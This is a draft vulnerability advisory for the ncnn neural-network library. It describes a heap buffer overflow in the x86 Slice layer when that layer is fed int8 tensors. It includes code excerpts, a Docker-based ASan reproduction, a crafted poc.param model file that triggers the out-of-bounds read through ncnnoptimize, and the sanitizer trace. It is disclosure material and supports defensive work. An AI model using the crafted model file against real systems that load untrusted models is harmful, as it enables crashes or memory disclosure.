All advisories
Draft

Heap Buffer Overflow in x86 Slice

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Buffer Overflow in x86 Slice

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/slice_x86.cpp:377 in Slice_x86::forward
Sanitizer verdict: heap-buffer-overflow

Summary

The x86 Slice layer diverts only 16-bit tensors to a separate implementation, so an 8-bit tensor — for example the output of a Quantize layer — is processed by the fp32 code and reinterpreted through const float*. When the declared slice lengths produce outputs with different packing (-23300=2,4,3 on axis 0 gives elempack 4 and 1), the unpacking branch strides one "row" per w floats and reads roughly four times past the end of the int8 source tensor. ncnnoptimize triggers this while running ModelWriter::shape_inference() on the attacker-supplied .param file.

Detail

Slice_x86::forward starts with if (bottom_blob.elembits() == 16) return forward_bf16s_fp16s(bottom_blobs, top_blobs, opt); — the only element-width dispatch in the function. An elembits() == 8 tensor falls straight through into code that assumes 4-byte elements. The PoC places a Quantize layer in front of the Slice, so bottom_blob is a 10x7 int8 Mat with elemsize = 1.

// src/layer/x86/slice_x86.cpp:170
        const float* ptr = bottom_blob_unpacked;
        for (size_t i = 0; i < top_blobs.size(); i++)
        {
            Mat& top_blob = top_blobs[i];

// src/layer/x86/slice_x86.cpp:364
            if (out_elempack == 1 && top_blob.elempack == 4)
            {
                for (int j = 0; j < top_blob.h; j++)
                {
                    const float* r0 = ptr;
                    const float* r1 = ptr + w;
                    const float* r2 = ptr + w * 2;
                    const float* r3 = ptr + w * 3;

                    float* outptr0 = top_blob.row(j);

                    for (int j = 0; j < w; j++)
                    {
                        outptr0[0] = *r0++;
                        outptr0[1] = *r1++;
                        outptr0[2] = *r2++;
                        outptr0[3] = *r3++;

The slice lengths come from parameter 0 (-23300=2,4,3). At line 136 the first length, 4, selects out_elempack = 4 while the second, 3, selects 1; lines 154-160 then take the minimum, 1, and because the int8 input already has elempack == 1 no convert_packing occurs. The first output therefore keeps elempack == 4 while the shared out_elempack is 1, which is exactly the condition at line 364.

Inside that branch ptr is the int8 buffer read as floats and w is 10, so r1, r2 and r3 are offset by 40, 80 and 120 bytes into a tensor whose payload is 70 bytes. Quantize allocated it through Mat::create(10, 7, 1u, 1), giving cstep = alignSize(70, 16) = 80 bytes of payload plus a 4-byte refcount and the 64-byte NCNN_MALLOC_OVERREAD pad, 148 bytes in total. The inner loop runs j = 0..9 over r3, so its eighth read touches byte 148 — the first address outside the allocation and the fault ASan reports at line 380.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-buffer-overflow-in-x86-slice && cd ncnn-poc-heap-buffer-overflow-in-x86-slice

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
3 4
Input data 0 1 data 0=10 1=7
Quantize quant 1 1 data quant
Slice slice 1 2 quant out0 out1 -23300=2,4,3
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x511000000494 at pc 0x5768987b10b6 bp 0x7ffceaa81b80 sp 0x7ffceaa81b70
READ of size 4 at 0x511000000494 thread T0
    #0 0x5768987b10b5 in ncnn::Slice_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/slice_x86_avx512.cpp:380
    #1 0x576894d7470b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #2 0x576894d5cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #3 0x576894dbc9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #4 0x576894c4e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #5 0x576894ccbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #6 0x7ad1efc471c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #7 0x7ad1efc4728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x576894c4b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x511000000494 is located 0 bytes after 148-byte region [0x511000000400,0x511000000494)
allocated by thread T0 here:
    #0 0x7ad1f02c0f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x576894ce068e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x576894ce068e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x576894d1f4b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
    #4 0x57689a63e391 in ncnn::Quantize_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/quantize_x86_avx512.cpp:342
    #5 0x576894d6af2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #6 0x576894d5cb7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #7 0x576894dbc9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #8 0x576894c4e3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #9 0x576894ccbeee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #10 0x7ad1efc471c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #11 0x7ad1efc4728a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x576894c4b624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/build/src/layer/x86/slice_x86_avx512.cpp:380 in ncnn::Slice_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const

Credit

Zheng Yu @ DepthFirst